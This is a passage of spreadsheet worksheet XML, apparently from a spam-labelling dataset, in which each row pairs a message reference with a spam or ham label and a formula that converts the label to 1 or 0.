    <row r="2075" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2075" t="s">
        <v>7293</v>
      </c>
      <c r="B2075" t="s">
        <v>5297</v>
      </c>
      <c r="C2075" s="1">
        <f>IF(B2075="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2076" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2076" t="s">
        <v>7294</v>
      </c>
      <c r="B2076" t="s">
        <v>5294</v>
      </c>
      <c r="C2076" s="1">
        <f>IF(B2076="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2077" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2077" t="s">
        <v>7295</v>
      </c>
      <c r="B2077" t="s">
        <v>5294</v>
      </c>
      <c r="C2077" s="1">
        <f>IF(B2077="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2078" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2078" t="s">
        <v>7296</v>
      </c>
      <c r="B2078" t="s">
        <v>5294</v>
      </c>
      <c r="C2078" s="1">
        <f>IF(B2078="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2079" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2079" t="s">
        <v>7297</v>
      </c>
      <c r="B2079" t="s">
        <v>5294</v>
      </c>
      <c r="C2079" s="1">
        <f>IF(B2079="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2080" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2080" t="s">
        <v>7298</v>
      </c>
      <c r="B2080" t="s">
        <v>5297</v>
      </c>
      <c r="C2080" s="1">
        <f>IF(B2080="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2081" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2081" t="s">
        <v>7299</v>
      </c>
      <c r="B2081" t="s">
        <v>5294</v>
      </c>
      <c r="C2081" s="1">
        <f>IF(B2081="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2082" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2082" t="s">
        <v>7300</v>
      </c>
      <c r="B2082" t="s">
        <v>5294</v>
      </c>
      <c r="C2082" s="1">
        <f>IF(B2082="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2083" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2083" t="s">
        <v>7301</v>
      </c>
      <c r="B2083" t="s">
        <v>5294</v>
      </c>
      <c r="C2083" s="1">
        <f>IF(B2083="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2084" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2084" t="s">
        <v>7302</v>
      </c>
      <c r="B2084" t="s">
        <v>5294</v>
      </c>
      <c r="C2084" s="1">
        <f>IF(B2084="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2085" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2085" t="s">
        <v>7303</v>
      </c>
      <c r="B2085" t="s">
        <v>5294</v>
      </c>
      <c r="C2085" s="1">
        <f>IF(B2085="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2086" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2086" t="s">
        <v>7304</v>
      </c>
      <c r="B2086" t="s">
        <v>5294</v>
      </c>
      <c r="C2086" s="1">
        <f>IF(B2086="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2087" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2087" t="s">
        <v>7305</v>
      </c>
      <c r="B2087" t="s">
        <v>5294</v>
      </c>
      <c r="C2087" s="1">
        <f>IF(B2087="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2088" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2088" t="s">
        <v>7306</v>
      </c>
      <c r="B2088" t="s">
        <v>5294</v>
      </c>
      <c r="C2088" s="1">
        <f>IF(B2088="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2089" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2089" t="s">
        <v>7307</v>
      </c>
      <c r="B2089" t="s">
        <v>5294</v>
      </c>
      <c r="C2089" s="1">
        <f>IF(B2089="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2090" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2090" t="s">
        <v>7308</v>
      </c>
      <c r="B2090" t="s">
        <v>5297</v>
      </c>
      <c r="C2090" s="1">
        <f>IF(B2090="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2091" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2091" t="s">
        <v>7309</v>
      </c>
      <c r="B2091" t="s">
        <v>5294</v>
      </c>
      <c r="C2091" s="1">
        <f>IF(B2091="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2092" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2092" t="s">
        <v>7310</v>
      </c>
      <c r="B2092" t="s">
        <v>5294</v>
      </c>
      <c r="C2092" s="1">
        <f>IF(B2092="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2093" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2093" t="s">
        <v>7311</v>
      </c>
      <c r="B2093" t="s">
        <v>5294</v>
      </c>
      <c r="C2093" s="1">
        <f>IF(B2093="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2094" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2094" t="s">
        <v>7312</v>
      </c>
      <c r="B2094" t="s">
        <v>5294</v>
      </c>
      <c r="C2094" s="1">
        <f>IF(B2094="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2095" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2095" t="s">
        <v>7313</v>
      </c>
      <c r="B2095" t="s">
        <v>5297</v>
      </c>
      <c r="C2095" s="1">
        <f>IF(B2095="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2096" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2096" t="s">
        <v>5414</v>
      </c>
      <c r="B2096" t="s">
        <v>5297</v>
      </c>
      <c r="C2096" s="1">
        <f>IF(B2096="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2097" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2097" t="s">
        <v>7314</v>
      </c>
      <c r="B2097" t="s">
        <v>5294</v>
      </c>
      <c r="C2097" s="1">
        <f>IF(B2097="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2098" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2098" t="s">
        <v>7315</v>
      </c>
      <c r="B2098" t="s">
        <v>5294</v>
      </c>
      <c r="C2098" s="1">
        <f>IF(B2098="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2099" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2099" t="s">
        <v>7316</v>
      </c>
      <c r="B2099" t="s">
        <v>5294</v>
      </c>
      <c r="C2099" s="1">
        <f>IF(B2099="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2100" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2100" t="s">
        <v>7317</v>
      </c>
      <c r="B2100" t="s">
        <v>5294</v>
      </c>
      <c r="C2100" s="1">
        <f>IF(B2100="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2101" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2101" t="s">
        <v>7318</v>
      </c>
      <c r="B2101" t="s">
        <v>5297</v>
      </c>
      <c r="C2101" s="1">
        <f>IF(B2101="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2102" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2102" t="s">
        <v>7319</v>
      </c>
      <c r="B2102" t="s">
        <v>5294</v>
      </c>
      <c r="C2102" s="1">
        <f>IF(B2102="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2103" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2103" t="s">
        <v>7320</v>
      </c>
      <c r="B2103" t="s">
        <v>5294</v>
      </c>
      <c r="C2103" s="1">
        <f>IF(B2103="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2104" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2104" t="s">
        <v>7321</v>
      </c>
      <c r="B2104" t="s">
        <v>5294</v>
      </c>
      <c r="C2104" s="1">
        <f>IF(B2104="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2105" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2105" t="s">
        <v>7322</v>
      </c>
      <c r="B2105" t="s">
        <v>5294</v>
      </c>
      <c r="C2105" s="1">
        <f>IF(B2105="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2106" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2106" t="s">
        <v>7323</v>
      </c>
      <c r="B2106" t="s">
        <v>5294</v>
      </c>
      <c r="C2106" s="1">
        <f>IF(B2106="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2107" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2107" t="s">
        <v>7324</v>
      </c>
      <c r="B2107" t="s">
        <v>5294</v>
      </c>
      <c r="C2107" s="1">
        <f>IF(B2107="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2108" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2108" t="s">
        <v>7325</v>
      </c>
      <c r="B2108" t="s">
        <v>5294</v>
      </c>
      <c r="C2108" s="1">
        <f>IF(B2108="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2109" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2109" t="s">
        <v>7326</v>
      </c>
      <c r="B2109" t="s">
        <v>5294</v>
      </c>
      <c r="C2109" s="1">
        <f>IF(B2109="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2110" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2110" t="s">
        <v>6606</v>
      </c>
      <c r="B2110" t="s">
        <v>5297</v>
      </c>
      <c r="C2110" s="1">
        <f>IF(B2110="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2111" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2111" t="s">
        <v>7327</v>
      </c>
      <c r="B2111" t="s">
        <v>5294</v>
      </c>
      <c r="C2111" s="1">
        <f>IF(B2111="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2112" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2112" t="s">
        <v>7328</v>
      </c>
      <c r="B2112" t="s">
        <v>5294</v>
      </c>
      <c r="C2112" s="1">
        <f>IF(B2112="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2113" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2113" t="s">
        <v>7329</v>
      </c>
      <c r="B2113" t="s">
        <v>5294</v>
      </c>
      <c r="C2113" s="1">
        <f>IF(B2113="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2114" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2114" t="s">
        <v>7330</v>
      </c>
      <c r="B2114" t="s">
        <v>5297</v>
      </c>
      <c r="C2114" s="1">
        <f>IF(B2114="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2115" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2115" t="s">
        <v>7331</v>
      </c>
      <c r="B2115" t="s">
        <v>5294</v>
      </c>
      <c r="C2115" s="1">
        <f>IF(B2115="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2116" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2116" t="s">
        <v>7332</v>
      </c>
      <c r="B2116" t="s">
        <v>5297</v>
      </c>
      <c r="C2116" s="1">
        <f>IF(B2116="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2117" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2117" t="s">
        <v>7333</v>
      </c>
      <c r="B2117" t="s">
        <v>5294</v>
      </c>
      <c r="C2117" s="1">
        <f>IF(B2117="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2118" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2118" t="s">
        <v>7334</v>
      </c>
      <c r="B2118" t="s">
        <v>5294</v>
      </c>
      <c r="C2118" s="1">
        <f>IF(B2118="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2119" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2119" t="s">
        <v>7335</v>
      </c>
      <c r="B2119" t="s">
        <v>5294</v>
      </c>
      <c r="C2119" s="1">
        <f>IF(B2119="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2120" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2120" t="s">
        <v>7336</v>
      </c>
      <c r="B2120" t="s">
        <v>5297</v>
      </c>
      <c r="C2120" s="1">
        <f>IF(B2120="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2121" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2121" t="s">
        <v>7337</v>
      </c>
      <c r="B2121" t="s">
        <v>5294</v>
      </c>
      <c r="C2121" s="1">
        <f>IF(B2121="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2122" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2122" t="s">
        <v>7338</v>
      </c>
      <c r="B2122" t="s">
        <v>5294</v>
      </c>
      <c r="C2122" s="1">
        <f>IF(B2122="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2123" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2123" t="s">
        <v>7339</v>
      </c>
      <c r="B2123" t="s">
        <v>5294</v>
      </c>
      <c r="C2123" s="1">
        <f>IF(B2123="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2124" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2124" t="s">
        <v>7340</v>
      </c>
      <c r="B2124" t="s">
        <v>5294</v>
      </c>
      <c r="C2124" s="1">
        <f>IF(B2124="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2125" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2125" t="s">
        <v>5792</v>
      </c>
      <c r="B2125" t="s">
        <v>5297</v>
      </c>
      <c r="C2125" s="1">
        <f>IF(B2125="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2126" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2126" t="s">
        <v>6228</v>
      </c>
      <c r="B2126" t="s">
        <v>5294</v>
      </c>
      <c r="C2126" s="1">
        <f>IF(B2126="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2127" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2127" t="s">
        <v>7341</v>
      </c>
      <c r="B2127" t="s">
        <v>5294</v>
      </c>
      <c r="C2127" s="1">
        <f>IF(B2127="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2128" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2128" t="s">
        <v>7342</v>
      </c>
      <c r="B2128" t="s">
        <v>5294</v>
      </c>
      <c r="C2128" s="1">
        <f>IF(B2128="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2129" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2129" t="s">
        <v>7343</v>
      </c>
      <c r="B2129" t="s">
        <v>5294</v>
      </c>
      <c r="C2129" s="1">
        <f>IF(B2129="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2130" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2130" t="s">
        <v>7344</v>
      </c>
      <c r="B2130" t="s">
        <v>5294</v>
      </c>
      <c r="C2130" s="1">
        <f>IF(B2130="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2131" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2131" t="s">
        <v>7345</v>
      </c>
      <c r="B2131" t="s">
        <v>5294</v>
      </c>
      <c r="C2131" s="1">
        <f>IF(B2131="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2132" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2132" t="s">
        <v>7346</v>
      </c>
      <c r="B2132" t="s">
        <v>5294</v>
      </c>
      <c r="C2132" s="1">
        <f>IF(B2132="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2133" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2133" t="s">
        <v>7347</v>
      </c>
      <c r="B2133" t="s">
        <v>5294</v>
      </c>
      <c r="C2133" s="1">
        <f>IF(B2133="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2134" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2134" t="s">
        <v>7348</v>
      </c>
      <c r="B2134" t="s">
        <v>5297</v>
      </c>
      <c r="C2134" s="1">
        <f>IF(B2134="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2135" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2135" t="s">
        <v>7349</v>
      </c>
      <c r="B2135" t="s">
        <v>5294</v>
      </c>
      <c r="C2135" s="1">
        <f>IF(B2135="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2136" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2136" t="s">
        <v>6254</v>
      </c>
      <c r="B2136" t="s">
        <v>5294</v>
      </c>
      <c r="C2136" s="1">
        <f>IF(B2136="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2137" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2137" t="s">
        <v>7350</v>
      </c>
      <c r="B2137" t="s">
        <v>5294</v>
      </c>
      <c r="C2137" s="1">
        <f>IF(B2137="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2138" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2138" t="s">
        <v>7351</v>
      </c>
      <c r="B2138" t="s">
        <v>5294</v>
      </c>
      <c r="C2138" s="1">
        <f>IF(B2138="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2139" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2139" t="s">
        <v>7352</v>
      </c>
      <c r="B2139" t="s">
        <v>5294</v>
      </c>
      <c r="C2139" s="1">
        <f>IF(B2139="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2140" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2140" t="s">
        <v>7353</v>
      </c>
      <c r="B2140" t="s">
        <v>5294</v>
      </c>
      <c r="C2140" s="1">
        <f>IF(B2140="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2141" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2141" t="s">
        <v>7354</v>
      </c>
      <c r="B2141" t="s">
        <v>5294</v>
      </c>
      <c r="C2141" s="1">
        <f>IF(B2141="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2142" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2142" t="s">
        <v>7355</v>
      </c>
      <c r="B2142" t="s">
        <v>5294</v>
      </c>
      <c r="C2142" s="1">
        <f>IF(B2142="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2143" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2143" t="s">
        <v>7356</v>
      </c>
      <c r="B2143" t="s">
        <v>5294</v>
      </c>
      <c r="C2143" s="1">
        <f>IF(B2143="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2144" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2144" t="s">
        <v>7357</v>
      </c>
      <c r="B2144" t="s">
        <v>5294</v>
      </c>
      <c r="C2144" s="1">
        <f>IF(B2144="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2145" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2145" t="s">
        <v>7358</v>
      </c>
      <c r="B2145" t="s">
        <v>5294</v>
      </c>
      <c r="C2145" s="1">
        <f>IF(B2145="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2146" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2146" t="s">
        <v>7359</v>
      </c>
      <c r="B2146" t="s">
        <v>5297</v>
      </c>
      <c r="C2146" s="1">
        <f>IF(B2146="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2147" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2147" t="s">
        <v>7332</v>
      </c>
      <c r="B2147" t="s">
        <v>5297</v>
      </c>
      <c r="C2147" s="1">
        <f>IF(B2147="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2148" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2148" t="s">
        <v>7360</v>
      </c>
      <c r="B2148" t="s">
        <v>5294</v>
      </c>
      <c r="C2148" s="1">
        <f>IF(B2148="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2149" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2149" t="s">
        <v>7361</v>
      </c>
      <c r="B2149" t="s">
        <v>5294</v>
      </c>
      <c r="C2149" s="1">
        <f>IF(B2149="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2150" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2150" t="s">
        <v>7362</v>
      </c>
      <c r="B2150" t="s">
        <v>5294</v>
      </c>
      <c r="C2150" s="1">
        <f>IF(B2150="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2151" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2151" t="s">
        <v>7363</v>
      </c>
      <c r="B2151" t="s">
        <v>5294</v>
      </c>
      <c r="C2151" s="1">
        <f>IF(B2151="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2152" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2152" t="s">
        <v>7364</v>
      </c>
      <c r="B2152" t="s">
        <v>5294</v>
      </c>
      <c r="C2152" s="1">
        <f>IF(B2152="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2153" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2153" t="s">
        <v>7365</v>
      </c>
      <c r="B2153" t="s">
        <v>5294</v>
      </c>
      <c r="C2153" s="1">
        <f>IF(B2153="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2154" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2154" t="s">
        <v>7366</v>
      </c>
      <c r="B2154" t="s">
        <v>5294</v>
      </c>
      <c r="C2154" s="1">
        <f>IF(B2154="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2155" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2155" t="s">
        <v>7367</v>
      </c>
      <c r="B2155" t="s">
        <v>5294</v>
      </c>
      <c r="C2155" s="1">
        <f>IF(B2155="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2156" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2156" t="s">
        <v>7368</v>
      </c>
      <c r="B2156" t="s">
        <v>5294</v>
      </c>
      <c r="C2156" s="1">
        <f>IF(B2156="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2157" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2157" t="s">
        <v>7369</v>
      </c>
      <c r="B2157" t="s">
        <v>5294</v>
      </c>
      <c r="C2157" s="1">
        <f>IF(B2157="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2158" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2158" t="s">
        <v>7370</v>
      </c>
      <c r="B2158" t="s">
        <v>5294</v>
      </c>
      <c r="C2158" s="1">
        <f>IF(B2158="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2159" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2159" t="s">
        <v>7371</v>
      </c>
      <c r="B2159" t="s">
        <v>5294</v>
      </c>
      <c r="C2159" s="1">
        <f>IF(B2159="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2160" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2160" t="s">
        <v>7372</v>
      </c>
      <c r="B2160" t="s">
        <v>5294</v>
      </c>
      <c r="C2160" s="1">
        <f>IF(B2160="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2161" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2161" t="s">
        <v>7373</v>
      </c>
      <c r="B2161" t="s">
        <v>5297</v>
      </c>
      <c r="C2161" s="1">
        <f>IF(B2161="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2162" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2162" t="s">
        <v>7374</v>
      </c>
      <c r="B2162" t="s">
        <v>5294</v>
      </c>
      <c r="C2162" s="1">
        <f>IF(B2162="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2163" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2163" t="s">
        <v>7375</v>
      </c>
      <c r="B2163" t="s">
        <v>5294</v>
      </c>
      <c r="C2163" s="1">
        <f>IF(B2163="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2164" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2164" t="s">
        <v>6628</v>
      </c>
      <c r="B2164" t="s">
        <v>5294</v>
      </c>
      <c r="C2164" s="1">
        <f>IF(B2164="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2165" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2165" t="s">
        <v>7376</v>
      </c>
      <c r="B2165" t="s">
        <v>5294</v>
      </c>
      <c r="C2165" s="1">
        <f>IF(B2165="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2166" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2166" t="s">
        <v>7377</v>
      </c>
      <c r="B2166" t="s">
        <v>5294</v>
      </c>
      <c r="C2166" s="1">
        <f>IF(B2166="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2167" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2167" t="s">
        <v>7378</v>
      </c>
      <c r="B2167" t="s">
        <v>5294</v>
      </c>
      <c r="C2167" s="1">
        <f>IF(B2167="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2168" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2168" t="s">
        <v>7379</v>
      </c>
      <c r="B2168" t="s">
        <v>5294</v>
      </c>
      <c r="C2168" s="1">
        <f>IF(B2168="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2169" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2169" t="s">
        <v>7380</v>
      </c>
      <c r="B2169" t="s">
        <v>5294</v>
      </c>
      <c r="C2169" s="1">
        <f>IF(B2169="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2170" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2170" t="s">
        <v>7381</v>
      </c>
      <c r="B2170" t="s">
        <v>5294</v>
      </c>
      <c r="C2170" s="1">
        <f>IF(B2170="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2171" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2171" t="s">
        <v>6152</v>
      </c>
      <c r="B2171" t="s">
        <v>5297</v>
      </c>
      <c r="C2171" s="1">
        <f>IF(B2171="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2172" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2172" t="s">
        <v>7382</v>
      </c>
      <c r="B2172" t="s">
        <v>5294</v>
      </c>
      <c r="C2172" s="1">
        <f>IF(B2172="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2173" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2173" t="s">
        <v>7383</v>
      </c>
      <c r="B2173" t="s">
        <v>5294</v>
      </c>
      <c r="C2173" s="1">
        <f>IF(B2173="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2174" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2174" t="s">
        <v>7384</v>
      </c>
      <c r="B2174" t="s">
        <v>5294</v>
      </c>
      <c r="C2174" s="1">
        <f>IF(B2174="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2175" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2175" t="s">
        <v>7385</v>
      </c>
      <c r="B2175" t="s">
        <v>5294</v>
      </c>
      <c r="C2175" s="1">
        <f>IF(B2175="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2176" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2176" t="s">
        <v>7386</v>
      </c>
      <c r="B2176" t="s">
        <v>5294</v>
      </c>
      <c r="C2176" s="1">
        <f>IF(B2176="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2177" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2177" t="s">
        <v>6326</v>
      </c>
      <c r="B2177" t="s">
        <v>5294</v>
      </c>
      <c r="C2177" s="1">
        <f>IF(B2177="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2178" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2178" t="s">
        <v>7387</v>
      </c>
      <c r="B2178" t="s">
        <v>5294</v>
      </c>
      <c r="C2178" s="1">
        <f>IF(B2178="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
